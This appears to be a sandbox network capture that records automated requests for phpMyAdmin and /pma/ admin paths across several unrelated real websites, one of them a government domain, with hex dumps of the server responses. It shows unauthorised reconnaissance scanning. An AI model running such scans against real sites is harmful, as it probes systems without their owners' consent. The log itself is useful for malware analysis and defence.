                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC397INData Raw: 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 31 30 30 25 20 31 30 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></spa
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                173192.168.2.66315744.199.96.179443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC182OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: pxndx-mcr.boletia.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC197INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 7358
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.12.2
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                ETag: "5df8f9a3-1cbe"
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC7358INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d e2 80 9c 73 74 79 6c 65 73 68 65 65 74 e2 80 9d 20 68 72 65 66 3d e2 80 9c 68 74 74 70 73 3a 2f 2f 75 73 65 2e 74 79 70 65 6b 69 74 2e 6e 65 74 2f 6e 6b 77 33 70 6c 72 2e 63 73 73 e2 80 9c 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 2c 20 2a 3a 62 65 66 6f 72 65 2c 20 2a 3a 61 66 74 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title>Document</title> <link rel=stylesheet href=https://use.typekit.net/nkw3plr.css> <style> *, *:before, *:after { box-sizing: border-box; position: rel


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                174192.168.2.663890185.78.166.130443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC207OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: www.xn--72c1aelbgm0bc7d2cb0etac4cc5mdm2mra.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC398INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=1cu8t1tn9j3ptjlvcbsiprrgvu; path=/
                                                                                                                                                                                                                                                                                                                                                                X-Cache-Status: MISS
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PleskLin
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC15986INData Raw: 31 64 32 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 74 68 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 21 2d 2d 20 53 74 61 72 74 20 4d 65 74 61 20 2d 2d 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 68 72 65 66 73 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 33 66 62 66 65 31 61 39 39 39 34 34 32 64 37 34 36 62 65 66 30 61 61 62 37 64 35 37 39 61 37 35 66 35 39 37 34 33 36 62 37 66 62 62 61 37 62 63 39 36
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 1d22<!DOCTYPE html><html lang="th"><head> ... Start Meta --> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta name="ahrefs-site-verification" content="3fbfe1a999442d746bef0aab7d579a75f597436b7fbba7bc96
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC11874INData Raw: e0 b8 b5 e0 b9 82 e0 b8 9a e0 b8 99 e0 b8 b1 e0 b8 aa e0 b9 81 e0 b8 a3 e0 b8 81 e0 b9 80 e0 b8 82 e0 b9 89 e0 b8 b2 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 32 70 78 3b 20 63 6f 6c 6f 72 3a 20 67 72 65 65 6e 3b 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 69 74 61 6c 69 63 22 3e 20 33 30 20 e0 b8 9a e0 b8 b2 e0 b8 97 3c 2f 73 70 61 6e 3e 20 e0 b8 a7 e0 b8 b1 e0 b8 99 e0 b8 99 e0 b8 b5 e0 b9 89 2d 20 33 31 20 e0 b8 aa e0 b8 b4 e0 b8 87 e0 b8 ab e0 b8 b2 e0 b8 84 e0 b8 a1 20 32 35 36 33 20 e0 b9 80 e0 b8 97 e0 b9 88 e0 b8 b2 e0 b8 99 e0 b8 b1 e0 b9 89 e0 b8 99 3c 2f 70 3e 20 2d 2d 3e 0a 09 09 09 09 09 09 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <span style="font-size: 22px; color: green; font-style: italic"> 30 </span> - 31 2563 </p> -->


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                175192.168.2.663138104.18.32.109443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC337OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: sport.autoplay.cloud
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: __cf_bm=rFUJfVj1Ep.q_B9GVJgxzRAsmv8ckHLmwIsjPmWiRVg-1707131766-1-AY/3/Y1ibVQoZ02SpACliRC5KzwLKzUsJaFlR0Fp8h0OnCoU9JdfgWjzL8hsfJH31BsORQsD0Bm2yRzlPv66gM0=
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1181INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 12941
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                                                                                                                                                                                                                                Cross-Origin-Embedder-Policy: require-corp
                                                                                                                                                                                                                                                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                Cross-Origin-Resource-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                Origin-Agent-Cluster: ?1
                                                                                                                                                                                                                                                                                                                                                                Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                                                                                                                                                                                                Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                cf-mitigated: challenge
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd5e6b99b12d-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC188INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edg
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 73 74 79 6c 65 3e 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 35 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 3b 63 6f 6c 6f 72 3a 23 33 31 33 31 33 31 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 79 73 74 65 6d 2d 75 69 2c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e"><meta name="robots" content="noindex,nofollow"><meta name="viewport" content="width=device-width,initial-scale=1"><style>*{box-sizing:border-box;margin:0;padding:0}html{line-height:1.15;-webkit-text-size-adjust:100%;color:#313131;font-family:system-ui,
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 7a 34 29 3b 7d 7d 40 6d 69 78 69 6e 20 6c 69 67 68 74 2d 6d 6f 64 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 20 63 6f 6c 6f 72 3a 20 23 33 31 33 31 33 31 3b 20 61 20 7b 63 6f 6c 6f 72 3a 20 23 30 30 35 31 63 33 3b 20 26 3a 68 6f 76 65 72 20 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 20 63 6f 6c 6f 72 3a 20 23 65 65 37 33 30 61 3b 7d 7d 20 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 20 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 35 39 35 39 35 39 20 74 72 61 6e 73 70 61 72 65 6e 74 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 7d 20 2e 66 6f 6e 74 2d 72 65 64 20 7b 63 6f 6c 6f 72 3a 20 23 66 63 35 37 34 61 3b 7d 20 2e 62 69 67 2d 62 75 74 74 6f 6e 2c 2e 70 6f 77 2d 62 75
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: z4);}}@mixin light-mode{background-color: transparent; color: #313131; a {color: #0051c3; &:hover {text-decoration: underline; color: #ee730a;}} .lds-ring div {border-color: #595959 transparent transparent;} .font-red {color: #fc574a;} .big-button,.pow-bu
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 6d 7d 2e 68 65 61 64 69 6e 67 2d 66 61 76 69 63 6f 6e 7b 77 69 64 74 68 3a 31 2e 35 72 65 6d 3b 68 65 69 67 68 74 3a 31 2e 35 72 65 6d 7d 7d 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 2c 2e 66 6f 6f 74 65 72 7b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 2e 35 72 65 6d 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 2e 35 72 65 6d 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 7d 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 68 31 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 2e 37 35 72 65 6d 3b
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: m}.heading-favicon{width:1.5rem;height:1.5rem}}.main-content,.footer{padding-right:1.5rem;padding-left:1.5rem}.main-wrapper{display:flex;flex:1;flex-direction:column;align-items:center}.font-red{color:#b20f03}.spacer{margin:2rem 0}.h1{line-height:3.75rem;
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ta:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDE
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 65 72 20 2e 72 61 79 2d 69 64 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 63 6f 64 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 6d 6f 6e 61 63 6f 2c 63 6f 75 72 69 65 72 2c 6d 6f 6e 6f 73 70 61 63 65 7d 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6f 76 65 72 66 6c 6f 77 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 7d 40 6d 65 64 69 61 20 28 77 69 64 74 68 20 3c 3d 20 37 32 30 70 78 29 7b 2e 64 69 61 67 6e 6f 73 74 69 63 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 63 6c 65 61 72 66 69 78 3a 61 66 74 65 72 7b 64 69 73 70 6c 61 79 3a 69 6e 69 74 69 61 6c 3b 63 6c 65 61
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: er .ray-id{text-align:center;code{font-family:monaco,courier,monospace}}.core-msg,.zone-name-title{overflow-wrap:break-word}@media (width <= 720px){.diagnostic-wrapper{display:flex;flex-wrap:wrap;justify-content:center}.clearfix:after{display:initial;clea
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 2f 6e 6f 73 63 72 69 70 74 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 73 70 6f 72 74 2e 61 75 74 6f 70 6c 61 79 2e 63 6c 6f 75 64 22 2c 63 54 79 70 65 3a 20 27 69 6e 74 65 72 61 63 74 69 76 65 27 2c 63 4e 6f 75 6e 63 65 3a 20 27 38 39 33 30 39 27 2c 63 52 61 79 3a 20 27 38 35 30 61 62 64 35 65 36 62 39 39 62 31 32 64 27 2c 63 48 61 73 68 3a 20 27 65 32 32 38 34 37 35 34 63 61 61 63 30 36 36 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 70 6d 61 5c 2f 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 73 5a 2e 44 76 63 36 5a 62 56 56 4c 62 37 46 4f 48 66 75 62 4d 58 6d 71 35 66 49 74 61 36 62 52 54 72 6b
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: /noscript></div></div><script>(function(){window._cf_chl_opt={cvId: '3',cZone: "sport.autoplay.cloud",cType: 'interactive',cNounce: '89309',cRay: '850abd5e6b99b12d',cHash: 'e2284754caac066',cUPMDTk: "\/pma\/?__cf_chl_tk=sZ.Dvc6ZbVVLb7FOHfubMXmq5fIta6bRTrk
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 7a 30 77 66 34 74 79 6e 65 6c 76 6d 69 75 32 6b 2d 37 6e 56 6b 46 66 56 6d 6d 30 79 66 4e 70 70 72 56 50 42 54 50 45 51 65 56 72 72 2d 62 44 52 69 4c 56 70 32 51 73 35 71 77 6e 55 42 42 61 6a 61 72 52 69 46 65 2d 4f 4b 51 64 6e 5a 54 63 68 50 4a 74 4c 56 66 47 68 71 49 66 65 63 2d 53 44 6d 55 49 6b 45 48 33 72 44 38 5f 57 64 44 39 30 6c 45 75 4c 54 37 4a 39 56 72 7a 55 63 41 4e 34 5a 79 53 66 5a 63 65 52 5a 6f 6b 73 71 7a 59 74 47 62 66 52 51 76 33 4d 2d 57 41 39 49 50 4a 52 53 4b 66 50 72 48 32 38 77 4c 6b 57 4c 66 4e 59 75 65 6a 61 54 5f 48 6a 64 73 4a 30 45 4f 76 4a 6b 48 41 67 6c 42 58 6b 79 33 65 34 2d 45 64 33 31 5a 51 62 5f 61 33 4b 69 61 79 71 49 38 42 79 74 4e 73 34 71 48 67 4c 4f 4f 62 57 4c 77 61 74 61 6d 76 46 78 5f 48 6a 57 68 30 43 78 76 61
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: z0wf4tynelvmiu2k-7nVkFfVmm0yfNpprVPBTPEQeVrr-bDRiLVp2Qs5qwnUBBajarRiFe-OKQdnZTchPJtLVfGhqIfec-SDmUIkEH3rD8_WdD90lEuLT7J9VrzUcAN4ZySfZceRZoksqzYtGbfRQv3M-WA9IPJRSKfPrH28wLkWLfNYuejaT_HjdsJ0EOvJkHAglBXky3e4-Ed31ZQb_a3KiayqI8BytNs4qHgLOObWLwatamvFx_HjWh0Cxva
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 75 52 72 38 30 46 66 31 59 50 62 37 41 46 6a 33 50 73 54 74 66 57 5f 43 6a 54 4c 72 33 69 30 5f 33 64 68 63 53 36 51 37 6c 6f 39 31 45 50 6d 59 52 47 7a 52 34 49 38 70 64 36 76 6b 57 72 63 78 54 4c 67 30 48 6c 33 74 6e 71 37 75 67 70 4f 70 65 49 35 38 7a 6d 33 4b 4c 37 4b 35 54 49 62 58 4c 68 6c 39 6a 32 62 66 53 42 68 4d 68 71 78 53 5a 53 6e 30 59 56 32 6d 64 31 69 35 4b 47 66 69 62 66 47 43 4c 6a 69 66 65 59 5f 41 52 78 69 6f 53 64 32 48 38 65 31 58 71 4d 7a 63 5f 51 4a 4a 6e 6a 59 33 44 66 31 70 47 76 4a 71 6c 79 6b 67 74 56 37 51 68 5a 77 7a 43 64 73 63 6f 4e 49 78 53 55 44 59 61 37 6c 43 6f 4c 4f 34 4f 55 63 37 71 30 38 6d 7a 53 52 79 5a 50 6b 32 73 67 55 4b 6f 4e 44 61 58 44 35 71 7a 65 6a 34 6d 74 66 34 69 37 55 45 71 66 5a 57 64 64 37 4d 6d 54 58
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: uRr80Ff1YPb7AFj3PsTtfW_CjTLr3i0_3dhcS6Q7lo91EPmYRGzR4I8pd6vkWrcxTLg0Hl3tnq7ugpOpeI58zm3KL7K5TIbXLhl9j2bfSBhMhqxSZSn0YV2md1i5KGfibfGCLjifeY_ARxioSd2H8e1XqMzc_QJJnjY3Df1pGvJqlykgtV7QhZwzCdscoNIxSUDYa7lCoLO4OUc7q08mzSRyZPk2sgUKoNDaXD5qzej4mtf4i7UEqfZWdd7MmTX
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC1369INData Raw: 2f 73 45 6c 62 69 64 42 69 56 74 30 33 78 78 6e 51 31 39 5a 36 4c 39 61 4f 72 56 6f 35 55 49 6e 4d 36 4d 74 65 64 70 34 4d 4b 4f 2b 67 57 4e 50 50 32 57 5a 2f 4f 76 6a 34 30 37 4f 52 61 59 7a 74 65 54 4d 54 53 4e 64 49 4c 54 55 43 35 58 4f 58 32 50 55 79 75 66 6e 62 78 45 2f 31 4c 47 30 30 2b 6c 54 4b 39 50 51 63 34 7a 4b 32 4e 48 77 51 75 63 51 50 6f 52 72 6c 43 34 75 4a 65 50 38 64 75 4f 2f 46 65 4a 56 67 48 37 32 53 45 51 47 42 49 30 6d 34 57 53 33 53 51 53 52 45 70 34 4c 61 6a 72 79 53 2f 72 64 30 32 79 70 31 44 7a 6b 46 79 46 6a 65 2f 6a 39 76 64 58 79 6d 50 76 2b 4f 47 78 79 30 32 6d 6b 33 51 4c 72 2f 76 2b 78 69 32 54 5a 65 6b 6f 53 50 46 44 52 4e 6a 50 33 30 62 43 30 33 66 73 77 6c 57 2b 6d 2f 32 7a 64 72 38 33 30 62 44 70 37 66 37 4b 52 39 6c 4a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: /sElbidBiVt03xxnQ19Z6L9aOrVo5UInM6Mtedp4MKO+gWNPP2WZ/Ovj407ORaYzteTMTSNdILTUC5XOX2PUyufnbxE/1LG00+lTK9PQc4zK2NHwQucQPoRrlC4uJeP8duO/FeJVgH72SEQGBI0m4WS3SQSREp4LajryS/rd02yp1DzkFyFje/j9vdXymPv+OGxy02mk3QLr/v+xi2TZekoSPFDRNjP30bC03fswlW+m/2zdr830bDp7f7KR9lJ


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                176192.168.2.664053164.100.213.210443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC171OUTGET /phpmyadmin/ HTTP/1.0
                                                                                                                                                                                                                                                                                                                                                                Host: ssc.nic.in
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
